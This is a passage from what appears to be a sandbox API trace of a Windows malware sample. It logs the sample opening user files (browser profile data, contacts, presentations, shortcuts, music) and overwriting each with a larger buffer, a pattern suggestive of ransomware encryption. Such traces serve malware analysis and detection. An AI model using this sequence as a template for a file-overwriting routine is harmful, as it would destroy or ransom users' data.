| out: lpMultiByteStr="bookmarks-2017-06-05_5.json", lpUsedDefaultChar=0x0) returned 27 [0177.685] ReadFile (in: hFile=0x1f0, lpBuffer=0x26ae978, nNumberOfBytesToRead=0xbdb, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x311f2bc*=0xbdb, lpOverlapped=0x0) returned 1 [0177.740] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0177.740] WriteFile (in: hFile=0x1f0, lpBuffer=0x26ae978*, nNumberOfBytesToWrite=0x1163, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesWritten=0x311f2d0*=0x1163, lpOverlapped=0x0) returned 1 [0177.741] CloseHandle (hObject=0x1f0) returned 1 [0177.741] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\search.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0177.742] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.742] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x4183 [0177.742] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.742] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.742] ReleaseMutex (hMutex=0x168) returned 1 [0177.742] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="search.json", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0177.742] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="search.json", cchWideChar=11, lpMultiByteStr=0x1f7362c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="search.json", lpUsedDefaultChar=0x0) returned 11 [0177.743] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0177.749] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x3183 [0177.749] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0177.749] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x3183 [0177.750] WriteFile (in: hFile=0x1f0, lpBuffer=0x2840938*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0177.750] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0177.750] WriteFile (in: hFile=0x1f0, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0177.750] CloseHandle (hObject=0x1f0) returned 1 [0177.750] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\T-Apr2907nXgSroJYT04.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\t-apr2907nxgsrojyt04.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0177.751] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.751] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xcafa [0177.751] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.751] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.751] ReleaseMutex (hMutex=0x168) returned 1 [0177.751] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="T-Apr2907nXgSroJYT04.avi", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0177.752] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="T-Apr2907nXgSroJYT04.avi", cchWideChar=24, lpMultiByteStr=0x1f8fc3c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="T-Apr2907nXgSroJYT04.avi", lpUsedDefaultChar=0x0) returned 24 [0177.752] ReadFile (in: hFile=0x1f0, lpBuffer=0x2840938, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0177.753] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xbafa [0177.753] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0177.753] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xbafa [0177.753] WriteFile (in: hFile=0x1f0, lpBuffer=0x2844968*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2844968*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0177.754] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0177.754] WriteFile (in: hFile=0x1f0, lpBuffer=0x2844968*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2844968*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0177.754] CloseHandle (hObject=0x1f0) returned 1 [0177.754] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0177.755] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.755] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x493 [0177.755] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.755] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.755] ReleaseMutex (hMutex=0x168) returned 1 [0177.756] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="asdlfk poopvy.contact", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0177.756] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="asdlfk poopvy.contact", cchWideChar=21, lpMultiByteStr=0x1f8867c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="asdlfk poopvy.contact", lpUsedDefaultChar=0x0) returned 21 [0177.756] ReadFile (in: hFile=0x1f0, lpBuffer=0x2840958, nNumberOfBytesToRead=0x493, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesRead=0x311f2bc*=0x493, lpOverlapped=0x0) returned 1 [0177.759] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0177.759] WriteFile (in: hFile=0x1f0, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0xa1b, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x311f2d0*=0xa1b, lpOverlapped=0x0) returned 1 [0177.759] CloseHandle (hObject=0x1f0) returned 1 [0177.759] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0177.760] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.760] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x192 [0177.761] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.761] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.761] ReleaseMutex (hMutex=0x168) returned 1 [0177.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0177.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x1f7356c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0177.761] ReadFile (in: hFile=0x1f0, lpBuffer=0x25be3f8, nNumberOfBytesToRead=0x192, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesRead=0x311f2bc*=0x192, lpOverlapped=0x0) returned 1 [0177.762] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0177.762] WriteFile (in: hFile=0x1f0, lpBuffer=0x2848ae8*, nNumberOfBytesToWrite=0x71a, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2848ae8*, lpNumberOfBytesWritten=0x311f2d0*=0x71a, lpOverlapped=0x0) returned 1 [0177.763] CloseHandle (hObject=0x1f0) returned 1 [0177.763] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LuyG_akLT95L1SaQpv.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\luyg_aklt95l1saqpv.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0177.763] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.764] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x1903 [0177.764] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.764] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.764] ReleaseMutex (hMutex=0x168) returned 1 [0177.764] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LuyG_akLT95L1SaQpv.pptx", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0177.764] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LuyG_akLT95L1SaQpv.pptx", cchWideChar=23, lpMultiByteStr=0x1f8867c, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LuyG_akLT95L1SaQpv.pptx", lpUsedDefaultChar=0x0) returned 23 [0177.764] ReadFile (in: hFile=0x1f0, lpBuffer=0x2840938, nNumberOfBytesToRead=0x1903, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x311f2bc*=0x1903, lpOverlapped=0x0) returned 1 [0177.765] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0177.765] WriteFile (in: hFile=0x1f0, lpBuffer=0x284a3f8*, nNumberOfBytesToWrite=0x1e8b, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x284a3f8*, lpNumberOfBytesWritten=0x311f2d0*=0x1e8b, lpOverlapped=0x0) returned 1 [0177.766] CloseHandle (hObject=0x1f0) returned 1 [0177.766] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vLykOV4Y_3l2VkIHp\\l9h2RZXXX5kbGC\\sqqa\\dDKg_tMgBIYUM56Tb.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vlykov4y_3l2vkihp\\l9h2rzxxx5kbgc\\sqqa\\ddkg_tmgbiyum56tb.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0177.766] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.766] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x9583 [0177.766] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.767] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.767] ReleaseMutex (hMutex=0x168) returned 1 [0177.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dDKg_tMgBIYUM56Tb.pptx", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0177.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dDKg_tMgBIYUM56Tb.pptx", cchWideChar=22, lpMultiByteStr=0x1f8867c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dDKg_tMgBIYUM56Tb.pptx", lpUsedDefaultChar=0x0) returned 22 [0177.767] ReadFile (in: hFile=0x1f0, lpBuffer=0x2840938, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0177.768] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x8583 [0177.768] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0177.768] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x8583 [0177.768] WriteFile (in: hFile=0x1f0, lpBuffer=0x2844968*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2844968*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0177.768] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0177.769] WriteFile (in: hFile=0x1f0, lpBuffer=0x2844968*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2844968*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0177.769] CloseHandle (hObject=0x1f0) returned 1 [0177.769] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0177.770] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.770] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x85 [0177.770] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.770] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.770] ReleaseMutex (hMutex=0x168) returned 1 [0177.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IE Add-on site.url", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0177.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IE Add-on site.url", cchWideChar=18, lpMultiByteStr=0x1f8867c, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IE Add-on site.url", lpUsedDefaultChar=0x0) returned 18 [0177.770] ReadFile (in: hFile=0x1f0, lpBuffer=0x2673898, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2673898*, lpNumberOfBytesRead=0x311f2bc*=0x85, lpOverlapped=0x0) returned 1 [0177.771] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0177.771] WriteFile (in: hFile=0x1f0, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x60d, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x311f2d0*=0x60d, lpOverlapped=0x0) returned 1 [0177.771] CloseHandle (hObject=0x1f0) returned 1 [0177.772] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0177.773] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.773] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x85 [0177.773] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.773] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.773] ReleaseMutex (hMutex=0x168) returned 1 [0177.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSN Sports.url", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0177.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSN Sports.url", cchWideChar=14, lpMultiByteStr=0x1f7360c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSN Sports.url", lpUsedDefaultChar=0x0) returned 14 [0177.774] ReadFile (in: hFile=0x1f0, lpBuffer=0x2673898, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2673898*, lpNumberOfBytesRead=0x311f2bc*=0x85, lpOverlapped=0x0) returned 1 [0177.775] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0177.775] WriteFile (in: hFile=0x1f0, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x60d, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x311f2d0*=0x60d, lpOverlapped=0x0) returned 1 [0177.775] CloseHandle (hObject=0x1f0) returned 1 [0177.775] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0177.777] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.777] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x1e6 [0177.777] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.777] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.777] ReleaseMutex (hMutex=0x168) returned 1 [0177.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Desktop.lnk", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0177.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Desktop.lnk", cchWideChar=11, lpMultiByteStr=0x1f7344c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Desktop.lnk", lpUsedDefaultChar=0x0) returned 11 [0177.777] ReadFile (in: hFile=0x1f0, lpBuffer=0x1f5cf28, nNumberOfBytesToRead=0x1e6, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f5cf28*, lpNumberOfBytesRead=0x311f2bc*=0x1e6, lpOverlapped=0x0) returned 1 [0177.779] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0177.779] WriteFile (in: hFile=0x1f0, lpBuffer=0x2848ae8*, nNumberOfBytesToWrite=0x76e, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2848ae8*, lpNumberOfBytesWritten=0x311f2d0*=0x76e, lpOverlapped=0x0) returned 1 [0177.779] CloseHandle (hObject=0x1f0) returned 1 [0177.779] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Dk2_EzNhKbGEIsxH\\DXsSdrVpN3W7Cdf\\0bReyfxBjmL.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\dk2_eznhkbgeisxh\\dxssdrvpn3w7cdf\\0breyfxbjml.mp3"), 